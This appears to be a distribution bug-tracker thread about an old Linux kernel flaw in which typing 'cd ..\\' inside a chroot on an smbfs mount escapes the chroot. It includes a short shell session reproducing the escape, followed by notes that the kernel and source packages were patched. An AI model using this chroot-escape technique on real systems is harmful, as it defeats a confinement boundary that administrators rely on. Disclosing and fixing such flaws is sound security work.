When doing a chroot inside of a smb-mounted filesystem (smbfs), it appears that you can break out of it using "cd ..\\" (2 backslashes). [root@server me]# pwd /path/to/my/dir [root@server me]# ls bin chroot etc lib [root@server me]# chroot . bash-2.05a# pwd / bash-2.05a# ls bin chroot etc lib bash-2.05a# cd ..\\ bash-2.05a# pwd /..\ bash-2.05a# ls <list of files from parent>
This is fixed in 2.6.16.14
Fixed in genpatches 2.6.16-9. Maintainers please bump: hardened-sources: johnm, hardened sh-sources: vapier (this is your bump reminder :P) suspend2-sources: brix xbox,xen-sources: chrb
Fixed in sys-kernel/suspend2-sources-2.6.16-r6.
All fixed, closing bug. vapier: *poke* re: sh-sources.